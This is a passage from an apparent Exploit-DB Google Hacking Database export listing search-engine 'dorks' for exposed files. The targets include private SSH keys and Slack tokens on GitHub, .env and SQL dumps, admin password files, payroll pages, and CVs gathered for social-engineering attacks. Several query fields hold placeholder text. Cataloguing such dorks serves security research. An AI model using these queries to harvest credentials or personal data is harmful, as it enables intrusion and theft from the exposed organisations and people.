<author>Reza Abasi</author>
</entry>
<entry>
<id>6986</id>
<link>https://www.exploit-db.com/ghdb/6986</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*/phpmyadmin/server_sql.php</shortDescription>
<textualDescription>Files Containing Juicy info:
site:*/phpmyadmin/server_sql.php
BR,
Reza Abasi (Turku)
Cyber Sec researcher
</textualDescription>
<query>site:*/phpmyadmin/server_sql.php</query>
<querystring>https://www.google.com/search?q=site:*/phpmyadmin/server_sql.php</querystring>
<edb></edb>
<date>2021-06-07</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5463</id>
<link>https://www.exploit-db.com/ghdb/5463</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*/robots.txt intext:User-agent:</shortDescription>
<textualDescription>File containing juicy info:
site:*/robots.txt intext:User-agent:
site:*/robots.txt intext:&quot;# robots.txt&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/robots.txt intext:User-agent:</query>
<querystring>https://www.google.com/search?q=site:*/robots.txt intext:User-agent:</querystring>
<edb></edb>
<date>2019-08-28</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5517</id>
<link>https://www.exploit-db.com/ghdb/5517</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*/sitemap/sitemap.xml</shortDescription>
<textualDescription>file containing juicy info:
site:*/sitemap/sitemap.xml
Reza Abasi(Turku)
</textualDescription>
<query>site:*/sitemap/sitemap.xml</query>
<querystring>https://www.google.com/search?q=site:*/sitemap/sitemap.xml</querystring>
<edb></edb>
<date>2019-09-11</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5558</id>
<link>https://www.exploit-db.com/ghdb/5558</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*/wp-settings.php</shortDescription>
<textualDescription>Files Containing Juicy info:
site:*/wp-settings.php
Reza Abasi(Turku)
</textualDescription>
<query>site:*/wp-settings.php</query>
<querystring>https://www.google.com/search?q=site:*/wp-settings.php</querystring>
<edb></edb>
<date>2019-09-27</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6646</id>
<link>https://www.exploit-db.com/ghdb/6646</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*gov.* intitle:index.of db</shortDescription>
<textualDescription># Title: Database Disclosure for specific domain
# Google Dork: site:*gov.* intitle:index.of db
# Date: 1/10/2020
# Author: Prajwal Khante
</textualDescription>
<query>site:*gov.* intitle:index.of db</query>
<querystring>https://www.google.com/search?q=site:*gov.* intitle:index.of db</querystring>
<edb></edb>
<date>2020-10-28</date>
<author>Prajwal Khante</author>
</entry>
<entry>
<id>8279</id>
<link>https://www.exploit-db.com/ghdb/8279</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.co.in intitle:index of /wp-admin</shortDescription>
<textualDescription># Google Dork: site:.co.in intitle:index of /wp-admin
# Files Containing Juicy Info
# Date: 25/10/2023
# Exploit Sachin Gupta</textualDescription>
<query>site:.co.in intitle:index of /wp-admin</query>
<querystring>https://www.google.com/search?q=site:.co.in intitle:index of /wp-admin</querystring>
<edb></edb>
<date>2023-10-25</date>
<author>Sachin Gupta</author>
</entry>
<entry>
<id>7950</id>
<link>https://www.exploit-db.com/ghdb/7950</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.com intitle:&quot;index of&quot; /ipa</shortDescription>
<textualDescription># Google Dork: site:.com intitle:&quot;index of&quot; /ipa
# Files Containing Juicy Info
# Date:22/06/2022
# Exploit Author: Simone Gasparato
</textualDescription>
<query>site:.com intitle:&quot;index of&quot; /ipa</query>
<querystring>https://www.google.com/search?q=site:.com intitle:&quot;index of&quot; /ipa</querystring>
<edb></edb>
<date>2022-06-22</date>
<author>Simone Gasparato</author>
</entry>
<entry>
<id>8281</id>
<link>https://www.exploit-db.com/ghdb/8281</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.com intitle:&quot;index of&quot; /mobikwike</shortDescription>
<textualDescription># Google Dork: site:.com intitle:&quot;index of&quot; /mobikwike
# Files Containing Juicy Info
# Date: 30/10/2023
# Exploit Husain Ahmad</textualDescription>
<query>site:.com intitle:&quot;index of&quot; /mobikwike</query>
<querystring>https://www.google.com/search?q=site:.com intitle:&quot;index of&quot; /mobikwike</querystring>
<edb></edb>
<date>2023-10-30</date>
<author>Husain Ahmad</author>
</entry>
<entry>
<id>7942</id>
<link>https://www.exploit-db.com/ghdb/7942</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.com intitle:&quot;index of&quot; /payments.txt</shortDescription>
<textualDescription># Google Dork: site:.com intitle:&quot;index of&quot; /payments.txt
# Files Containing Juicy Info
# Date: 19/06/2022
# Exploit Author: Chirag Lundwani</textualDescription>
<query>site:.com intitle:&quot;index of&quot; /payments.txt</query>
<querystring>https://www.google.com/search?q=site:.com intitle:&quot;index of&quot; /payments.txt</querystring>
<edb></edb>
<date>2022-06-20</date>
<author>Chirag Lundwani</author>
</entry>
<entry>
<id>7944</id>
<link>https://www.exploit-db.com/ghdb/7944</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.com intitle:&quot;index of&quot; /paypal</shortDescription>
<textualDescription># Google Dork: site:.com intitle:&quot;index of&quot; /paypal
# Files Containing Juicy Info
# Date: 19/06/2022
# Exploit Author: Chirag Lundwani</textualDescription>
<query>site:.com intitle:&quot;index of&quot; /paypal</query>
<querystring>https://www.google.com/search?q=site:.com intitle:&quot;index of&quot; /paypal</querystring>
<edb></edb>
<date>2022-06-20</date>
<author>Chirag Lundwani</author>
</entry>
<entry>
<id>8286</id>
<link>https://www.exploit-db.com/ghdb/8286</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.com intitle:&quot;index of&quot;/csb</shortDescription>
<textualDescription># Google Dork: site:.com intitle:&quot;index of&quot;/csb
# Files Containing Juicy Info
# Date: 30/10/2023
# Exploit Husain Ahmad</textualDescription>
<query>site:.com intitle:&quot;index of&quot;/csb</query>
<querystring>https://www.google.com/search?q=site:.com intitle:&quot;index of&quot;/csb</querystring>
<edb></edb>
<date>2023-10-30</date>
<author>Husain Ahmad</author>
</entry>
<entry>
<id>8285</id>
<link>https://www.exploit-db.com/ghdb/8285</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.com intitle:&quot;index of&quot;/sbi</shortDescription>
<textualDescription># Google Dork: site:.com intitle:&quot;index of&quot;/sbi
# Files Containing Juicy Info
# Date: 30/10/2023
# Exploit Husain Ahmad</textualDescription>
<query>site:.com intitle:&quot;index of&quot;/sbi</query>
<querystring>https://www.google.com/search?q=site:.com intitle:&quot;index of&quot;/sbi</querystring>
<edb></edb>
<date>2023-10-30</date>
<author>Husain Ahmad</author>
</entry>
<entry>
<id>8116</id>
<link>https://www.exploit-db.com/ghdb/8116</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.com intitle:index of /wp-admin</shortDescription>
<textualDescription># Google Dork: site:.com intitle:index of /wp-admin
# Files Containing Juicy Info
# Date:16/03/2023
# Exploit Author: PRINCY M JOSE</textualDescription>
<query>site:.com intitle:index of /wp-admin</query>
<querystring>https://www.google.com/search?q=site:.com intitle:index of /wp-admin</querystring>
<edb></edb>
<date>2023-03-16</date>
<author>PRINCY M JOSE</author>
</entry>
<entry>
<id>8282</id>
<link>https://www.exploit-db.com/ghdb/8282</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.com inurl:/pass-aspx.</shortDescription>
<textualDescription># Google Dork: site:.com inurl:/pass-aspx.
# Files Containing Juicy Info
# Date: 30/10/2023
# Exploit swara kalsekar</textualDescription>
<query>Submiting a google dork.</query>
<querystring>https://www.google.com/search?q=Submiting a google dork.</querystring>
<edb></edb>
<date>2023-10-30</date>
<author>swara kalsekar</author>
</entry>
<entry>
<id>8258</id>
<link>https://www.exploit-db.com/ghdb/8258</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.com inurl:/signup.aspx</shortDescription>
<textualDescription># Google Dork: site:.com inurl:/signup.aspx
# Files Containing Juicy Info
# Date: 16/10/2023
# Exploit Mayuresh Gadhekar</textualDescription>
<query>site:.com inurl:/signup.aspx</query>
<querystring>https://www.google.com/search?q=site:.com inurl:/signup.aspx</querystring>
<edb></edb>
<date>2023-10-16</date>
<author>Mayuresh Gadhekar</author>
</entry>
<entry>
<id>7730</id>
<link>https://www.exploit-db.com/ghdb/7730</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.edu intext:&quot;index of&quot; &quot;logs&quot;</shortDescription>
<textualDescription># Google Dork: site:.edu intext:&quot;index of&quot; &quot;logs&quot;
# Files Containing Juicy Info
# Date:9/11/2021
# Exploit Author: Anirudh Kumar Kushwaha</textualDescription>
<query>site:.edu intext:&quot;index of&quot; &quot;logs&quot;</query>
<querystring>https://www.google.com/search?q=site:.edu intext:&quot;index of&quot; &quot;logs&quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Anirudh Kumar Kushwaha</author>
</entry>
<entry>
<id>7810</id>
<link>https://www.exploit-db.com/ghdb/7810</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.edu intext:&quot;index of&quot; &quot;payroll&quot;</shortDescription>
<textualDescription># Google Dork: site:.edu intext:&quot;index of&quot; &quot;payroll&quot;
# Files Containing Juicy Info
# Date:15/11/2021
# Exploit Author: Anirudh Kumar Kushwaha</textualDescription>
<query>site:.edu intext:&quot;index of&quot; &quot;payroll&quot;</query>
<querystring>https://www.google.com/search?q=site:.edu intext:&quot;index of&quot; &quot;payroll&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Anirudh Kumar Kushwaha</author>
</entry>
<entry>
<id>7906</id>
<link>https://www.exploit-db.com/ghdb/7906</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.edu intext:&quot;index of&quot; &quot;shell&quot;</shortDescription>
<textualDescription># Google Dork: site:.edu intext:&quot;index of&quot; &quot;shell&quot;
# Files Containing Juicy Info
# Date: 24/12/2021
# Exploit Author: Girish B O</textualDescription>
<query>site:.edu intext:&quot;index of&quot; &quot;shell&quot;</query>
<querystring>https://www.google.com/search?q=site:.edu intext:&quot;index of&quot; &quot;shell&quot;</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Girish B O</author>
</entry>
<entry>
<id>8364</id>
<link>https://www.exploit-db.com/ghdb/8364</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.edu intext:&quot;robotics&quot; inurl:/research</shortDescription>
<textualDescription># Google Dork: site:.edu intext:&quot;robotics&quot; inurl:/research
# Files Containing Juicy Info
# Date: 30/11/2023
# Exploit: Chunfeng Huang</textualDescription>
<query>site:.edu intext:&quot;robotics&quot; inurl:/research</query>
<querystring>https://www.google.com/search?q=site:.edu intext:&quot;robotics&quot; inurl:/research</querystring>
<edb></edb>
<date>2023-11-30</date>
<author>Chunfeng Huang</author>
</entry>
<entry>
<id>7703</id>
<link>https://www.exploit-db.com/ghdb/7703</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.edu intitle:&quot;index of&quot;</shortDescription>
<textualDescription># Google Dork: site:.edu intitle:&quot;index of&quot;
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Anirudh Kumar Kushwaha</textualDescription>
<query>site:.edu intitle:&quot;index of&quot;</query>
<querystring>https://www.google.com/search?q=site:.edu intitle:&quot;index of&quot;</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Anirudh Kumar Kushwaha</author>
</entry>
<entry>
<id>7706</id>
<link>https://www.exploit-db.com/ghdb/7706</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.edu inurl:search</shortDescription>
<textualDescription># Google Dork: site:.edu inurl:search
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Anirudh Kumar Kushwaha</textualDescription>
<query>site:.edu inurl:search</query>
<querystring>https://www.google.com/search?q=site:.edu inurl:search</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Anirudh Kumar Kushwaha</author>
</entry>
<entry>
<id>4071</id>
<link>https://www.exploit-db.com/ghdb/4071</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.edu | .gov ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup</shortDescription>
<textualDescription>Dork :
site:.edu | .gov ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup
This Will help to grab the Backup and old file of the (.gov and .edu)
Website's
By : Mishra Dhiraj (D)</textualDescription>
<query>site:.edu | .gov ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup</query>
<querystring>https://www.google.com/search?q=site:.edu | .gov ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup</querystring>
<edb></edb>
<date>2015-09-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>7378</id>
<link>https://www.exploit-db.com/ghdb/7378</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.execute-api.us-east-1.amazonaws.com</shortDescription>
<textualDescription># Google Dork: site:.execute-api.us-east-1.amazonaws.com
# Files Containing Juicy Info
# Date: 24/10/2021
# Exploit Author: Lutzenfried</textualDescription>
<query>site:.execute-api.us-east-1.amazonaws.com</query>
<querystring>https://www.google.com/search?q=site:.execute-api.us-east-1.amazonaws.com</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>Lutzenfried</author>
</entry>
<entry>
<id>6983</id>
<link>https://www.exploit-db.com/ghdb/6983</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.gov.co intitle:Index of</shortDescription>
<textualDescription># Google Dork: site:.gov.co intitle:Index of
# Files Containing Juicy Info
# Date: 03/06/2021
# Exploit Author: Om Satyarthi</textualDescription>
<query>site:.gov.co intitle:Index of</query>
<querystring>https://www.google.com/search?q= site:.gov.co intitle:Index of</querystring>
<edb></edb>
<date>2021-06-03</date>
<author>Om Satyarthi</author>
</entry>
<entry>
<id>8114</id>
<link>https://www.exploit-db.com/ghdb/8114</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.in intext:&quot;Index of&quot; intitle:&quot;index of&quot;</shortDescription>
<textualDescription># Google Dork: site:.in intext:&quot;Index of&quot; intitle:&quot;index of&quot;
# Files Containing Juicy Info
# Date:16/03/2023
# Exploit Author: BASIL ELDHOSE</textualDescription>
<query>site:.in intext:&quot;Index of&quot; intitle:&quot;index of&quot;</query>
<querystring>https://www.google.com/search?q=site:.in intext:&quot;Index of&quot; intitle:&quot;index of&quot;</querystring>
<edb></edb>
<date>2023-03-16</date>
<author>BASIL ELDHOSE</author>
</entry>
<entry>
<id>7772</id>
<link>https://www.exploit-db.com/ghdb/7772</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.in | .com | .net intitle:&quot;index of&quot; ftp</shortDescription>
<textualDescription># Google Dork: site:.in | .com | .net intitle:&quot;index of&quot; ftp
# Files Containing Juicy Info
# Date:11/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>site:.in | .com | .net intitle:&quot;index of&quot; ftp</query>
<querystring>https://www.google.com/search?q=site:.in | .com | .net intitle:&quot;index of&quot; ftp</querystring>
<edb></edb>
<date>2021-11-11</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7767</id>
<link>https://www.exploit-db.com/ghdb/7767</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.nic.in inurl:.php?id=</shortDescription>
<textualDescription># Google Dork: site:.nic.in inurl:.php?id=
# Files Containing Juicy Info
# Date:11/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>site:.nic.in inurl:.php?id=</query>
<querystring>https://www.google.com/search?q=site:.nic.in inurl:.php?id=</querystring>
<edb></edb>
<date>2021-11-11</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>8340</id>
<link>https://www.exploit-db.com/ghdb/8340</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.org.in intitle:index of /wp-admin</shortDescription>
<textualDescription># Google Dork: site:.org.in intitle:index of /wp-admin
# Files Containing Juicy Info
# Date: 10/11/2023
# Exploit: Ritik Singh</textualDescription>
<query>Google Dork</query>
<querystring>https://www.google.com/search?q=Google Dork</querystring>
<edb></edb>
<date>2023-11-10</date>
<author>Ritik Singh</author>
</entry>
<entry>
<id>7946</id>
<link>https://www.exploit-db.com/ghdb/7946</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:amazonaws.com inurl:elb.amazonaws.com</shortDescription>
<textualDescription># Google Dork: site:amazonaws.com inurl:elb.amazonaws.com
# Files Containing Juicy Info
# Date: 19/06/2022
# Author: Juan Christian
# Description: discover AWS Elastic Load Balancer (ELB) endpoints.</textualDescription>
<query>site:amazonaws.com inurl:elb.amazonaws.com</query>
<querystring>https://www.google.com/search?q=site:amazonaws.com inurl:elb.amazonaws.com</querystring>
<edb></edb>
<date>2022-06-20</date>
<author>Juan Christian</author>
</entry>
<entry>
<id>3935</id>
<link>https://www.exploit-db.com/ghdb/3935</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:bitbucket.org inurl:.bash_history</shortDescription>
<textualDescription>Finding Sensitive data
site:bitbucket.org inurl:.bash_history
By Pharos</textualDescription>
<query>site:bitbucket.org inurl:.bash_history</query>
<querystring>https://www.google.com/search?q=site:bitbucket.org inurl:.bash_history</querystring>
<edb></edb>
<date>2014-02-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>7945</id>
<link>https://www.exploit-db.com/ghdb/7945</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:cloudfront.net inurl:d</shortDescription>
<textualDescription># Google Dork: site:cloudfront.net inurl:d
# Files Containing Juicy Info
# Date: 19/06/2022
# Author: Juan Christian
# Description: discover AWS CloudFront endpoints.</textualDescription>
<query>site:cloudfront.net inurl:d</query>
<querystring>https://www.google.com/search?q=site:cloudfront.net inurl:d</querystring>
<edb></edb>
<date>2022-06-20</date>
<author>Juan Christian</author>
</entry>
<entry>
<id>7729</id>
<link>https://www.exploit-db.com/ghdb/7729</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:com &quot;rfp&quot; filetype:pdf</shortDescription>
<textualDescription># Google Dork: site:com &quot;rfp&quot; filetype:pdf
# Files Containing Juicy Info
# Date: 10/11/2021
# Exploit Author: Satish Kumar Singh</textualDescription>
<query>site:com &quot;rfp&quot; filetype:pdf</query>
<querystring>https://www.google.com/search?q=site:com &quot;rfp&quot; filetype:pdf</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Satish Kumar Singh</author>
</entry>
<entry>
<id>7720</id>
<link>https://www.exploit-db.com/ghdb/7720</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:com intitle:&quot;index of&quot; .env</shortDescription>
<textualDescription># Google Dork: site:com intitle:&quot;index of&quot; .env
# Files Containing Juicy Info
# Date:9/11/2021
# Exploit Author: Suvendu Dash</textualDescription>
<query>site:com intitle:&quot;index of&quot; .env</query>
<querystring>https://www.google.com/search?q=site:com intitle:&quot;index of&quot; .env</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Suvendu Dash</author>
</entry>
<entry>
<id>7896</id>
<link>https://www.exploit-db.com/ghdb/7896</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:com.* intitle:&quot;index of&quot; *.admin</shortDescription>
<textualDescription># Google Dork: site:com.* intitle:&quot;index of&quot; *.admin
# Files Containing Juicy Info
# Date: 24/12/2021
# Exploit Author: Girish B O</textualDescription>
<query>site:com.* intitle:&quot;index of&quot; *.admin</query>
<querystring>https://www.google.com/search?q=site:com.* intitle:&quot;index of&quot; *.admin</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Girish B O</author>
</entry>
<entry>
<id>7897</id>
<link>https://www.exploit-db.com/ghdb/7897</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:com.* intitle:&quot;index of&quot; *.admin.password</shortDescription>
<textualDescription># Google Dork:site:com.* intitle:&quot;index of&quot; *.admin.password
# Files Containing Juicy Info
# Date: 24/12/2021
# Exploit Author: Girish B O</textualDescription>
<query>site:com.* intitle:&quot;index of&quot; *.admin.password</query>
<querystring>https://www.google.com/search?q=site:com.* intitle:&quot;index of&quot; *.admin.password</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Girish B O</author>
</entry>
<entry>
<id>7904</id>
<link>https://www.exploit-db.com/ghdb/7904</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:com.* intitle:&quot;index of&quot; *.db</shortDescription>
<textualDescription># Google Dork: site:com.* intitle:&quot;index of&quot; *.db
# Files Containing Juicy Info
# Date: 24/12/2021
# Exploit Author: Girish B O</textualDescription>
<query>site:com.* intitle:&quot;index of&quot; *.db</query>
<querystring>https://www.google.com/search?q=site:com.* intitle:&quot;index of&quot; *.db</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Girish B O</author>
</entry>
<entry>
<id>7905</id>
<link>https://www.exploit-db.com/ghdb/7905</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:com.* intitle:&quot;index of&quot; *.sql</shortDescription>
<textualDescription># Google Dork: site:com.* intitle:&quot;index of&quot; *.sql
# Files Containing Juicy Info
# Date: 24/12/2021
# Exploit Author: Girish B O</textualDescription>
<query>site:com.* intitle:&quot;index of&quot; *.sql</query>
<querystring>https://www.google.com/search?q=site:com.* intitle:&quot;index of&quot; *.sql</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Girish B O</author>
</entry>
<entry>
<id>7902</id>
<link>https://www.exploit-db.com/ghdb/7902</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:com.* intitle:&quot;index of&quot; *shell.php</shortDescription>
<textualDescription># Google Dork: site:com.* intitle:&quot;index of&quot; *shell.php
# Files Containing Juicy Info
# Date: 24/12/2021
# Exploit Author: Girish B O</textualDescription>
<query>site:com.* intitle:&quot;index of&quot; *shell.php</query>
<querystring>https://www.google.com/search?q=site:com.* intitle:&quot;index of&quot; *shell.php</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Girish B O</author>
</entry>
<entry>
<id>3728</id>
<link>https://www.exploit-db.com/ghdb/3728</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:dl.dropbox.com filetype:pdf cv OR curriculum vitae OR resume</shortDescription>
<textualDescription>Searches Dropbox for publicly avaliable PDF's containing information used in
a CV/Resume/Curriculum Vitae which can therefore be used in a Social
Engineering based vector attack.
Author: Trevor Starick</textualDescription>
<query>site:dl.dropbox.com filetype:pdf cv OR curriculum vitae OR resume</query>
<querystring>https://www.google.com/search?q=site:dl.dropbox.com filetype:pdf cv OR curriculum vitae OR resume</querystring>
<edb></edb>
<date>2011-07-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>3729</id>
<link>https://www.exploit-db.com/ghdb/3729</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:docs.google.com intitle:(cv Or resume OR curriculum vitae)</shortDescription>
<textualDescription>Searches GoogleDocs for publicly avaliable PDF's containing information used in
a CV/Resume/Curriculum Vitae which can therefore be used in a Social
Engineering based vector attack.
--
Trevor Starick</textualDescription>
<query>site:docs.google.com intitle:(cv Or resume OR curriculum vitae)</query>
<querystring>https://www.google.com/search?q=site:docs.google.com intitle:(cv Or resume OR curriculum vitae)</querystring>
<edb></edb>
<date>2011-07-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>5427</id>
<link>https://www.exploit-db.com/ghdb/5427</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:docs.google.com inurl:forms | viewanalytics intext:see previous responses</shortDescription>
<textualDescription>Forms Containing Juicy Info
# Google Dork: site:docs.google.com inurl:forms | viewanalytics intext:see previous responses
# Date: [21-08-2019]
# Author: [Mohammed*_*]
</textualDescription>
<query>site:docs.google.com inurl:forms | viewanalytics intext:see previous responses</query>
<querystring>https://www.google.com/search?q=site:docs.google.com inurl:forms | viewanalytics intext:see previous responses</querystring>
<edb></edb>
<date>2019-08-21</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>8320</id>
<link>https://www.exploit-db.com/ghdb/8320</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:docs.google.com inurl:spreadsheets/d/ intitle:&quot;QUERY&quot;</shortDescription>
<textualDescription># Google Dork: site:docs.google.com inurl:spreadsheets/d/ intitle:&quot;QUERY&quot;
# Files Containing Juicy Info
# Date: 02/11/2023
# Exploit: Jowin John Chemban</textualDescription>
<query>Google Docs data breach through dorks</query>
<querystring>https://www.google.com/search?q=Google Docs data breach through dorks</querystring>
<edb></edb>
<date>2023-11-02</date>
<author>Jowin John Chemban</author>
</entry>
<entry>
<id>7778</id>
<link>https://www.exploit-db.com/ghdb/7778</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:drive.google.com &quot;*.pdf&quot;</shortDescription>
<textualDescription># Google Dork: site:drive.google.com &quot;*.pdf&quot;
# Files Containing Juicy Info
# Date:12/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>site:drive.google.com &quot;*.pdf&quot;</query>
<querystring>https://www.google.com/search?q=site:drive.google.com &quot;*.pdf&quot;</querystring>
<edb></edb>
<date>2021-11-12</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>47</id>
<link>https://www.exploit-db.com/ghdb/47</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:edu admin grades</shortDescription>
<textualDescription>I never really thought about this until I started coming up with juicy examples for DEFCON 11.. A few GLARINGLY bad examples contain not only student grades and names, but also social security numbers, securing the highest of all googledork ratings!</textualDescription>
<query>site:edu admin grades</query>
<querystring>https://www.google.com/search?q=site%3Aedu+grades+admin</querystring>
<edb></edb>
<date>2003-07-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>5539</id>
<link>https://www.exploit-db.com/ghdb/5539</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:ftp.*.* index of: manifest.xml</shortDescription>
<textualDescription>*Dork: *site:ftp.*.* index of: manifest.xml
*Author: Deepak Kumar(PAC Security)*
*DATE: 17 Sep 2109*
*CATEGORY: Files containing juicy info*
</textualDescription>
<query>site:ftp.*.* index of: manifest.xml</query>
<querystring>https://www.google.com/search?q=site:ftp.*.* index of: manifest.xml</querystring>
<edb></edb>
<date>2019-09-17</date>
<author>Deepak Kumar</author>
</entry>
<entry>
<id>6737</id>
<link>https://www.exploit-db.com/ghdb/6737</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:ftp.*.*.* &quot;ComputerName=&quot; + &quot;[Unattended] UnattendMode&quot;</shortDescription>
<textualDescription># Google Dork: site:ftp.*.*.* &quot;ComputerName=&quot; + &quot;[Unattended] UnattendMode&quot;
# Files containing juicy info.
# Date: 24/12/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>site:ftp.*.*.* &quot;ComputerName=&quot; + &quot;[Unattended] UnattendMode&quot;</query>
<querystring>https://www.google.com/search?q=site:ftp.*.*.* &quot;ComputerName=&quot; + &quot;[Unattended] UnattendMode&quot;</querystring>
<edb></edb>
<date>2021-01-05</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6502</id>
<link>https://www.exploit-db.com/ghdb/6502</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:ftp://ftp.*.* ext:sql</shortDescription>
<textualDescription>Dork: site:ftp://ftp.*.* ext:sql
Files containing Juicy info:
site:ftp://ftp.*.* ext:sql
BR,
Reza Abasi(Turku)
</textualDescription>
<query>site:ftp://ftp.*.* ext:sql</query>
<querystring>https://www.google.com/search?q=site:ftp://ftp.*.* ext:sql</querystring>
<edb></edb>
<date>2020-08-28</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4271</id>
<link>https://www.exploit-db.com/ghdb/4271</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:github.com filetype:md | filetype:js | filetype:txt &quot;xoxp-&quot;</shortDescription>
<textualDescription>Slack auth tokens used by &quot;chatops&quot; bot developers mistakenly disclosed on github.com:
site:github.com filetype:md | filetype:js | filetype:txt &quot;xoxp-&quot;
--
Nicholas Hinsch</textualDescription>
<query>site:github.com filetype:md | filetype:js | filetype:txt &quot;xoxp-&quot;</query>
<querystring>https://www.google.com/search?q=site:github.com filetype:md | filetype:js | filetype:txt &quot;xoxp-&quot;</querystring>
<edb></edb>
<date>2016-04-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>7534</id>
<link>https://www.exploit-db.com/ghdb/7534</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:github.com intext:&quot;unattend xmlns&quot; AND &quot;password&quot; ext:xml</shortDescription>
<textualDescription># Google Dork: site:github.com intext:&quot;unattend xmlns&quot; AND &quot;password&quot; ext:xml
# Files Containing Juicy Info
# Date: 29/10/2021
# Exploit Author: Aftab Alam</textualDescription>
<query>site:github.com intext:&quot;unattend xmlns&quot; AND &quot;password&quot; ext:xml</query>
<querystring>https://www.google.com/search?q=site:github.com intext:&quot;unattend xmlns&quot; AND &quot;password&quot; ext:xml</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>3908</id>
<link>https://www.exploit-db.com/ghdb/3908</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:github.com inurl:&quot;id_rsa&quot; -inurl:&quot;pub&quot;</shortDescription>
<textualDescription>Finds private SSH keys on GitHub.
- Andy G - twitter.com/vxhex</textualDescription>
<query>site:github.com inurl:&quot;id_rsa&quot; -inurl:&quot;pub&quot;</query>
<querystring>https://www.google.com/search?q=site:github.com inurl:&quot;id_rsa&quot; -inurl:&quot;pub&quot;</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>3907</id>
<link>https://www.exploit-db.com/ghdb/3907</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:github.com inurl:&quot;known_hosts&quot; &quot;ssh-rsa&quot;</shortDescription>
<textualDescription>Finds SSH known_hosts files on GitHub.
- Andy G - twitter.com/vxhex</textualDescription>
<query>site:github.com inurl:&quot;known_hosts&quot; &quot;ssh-rsa&quot;</query>
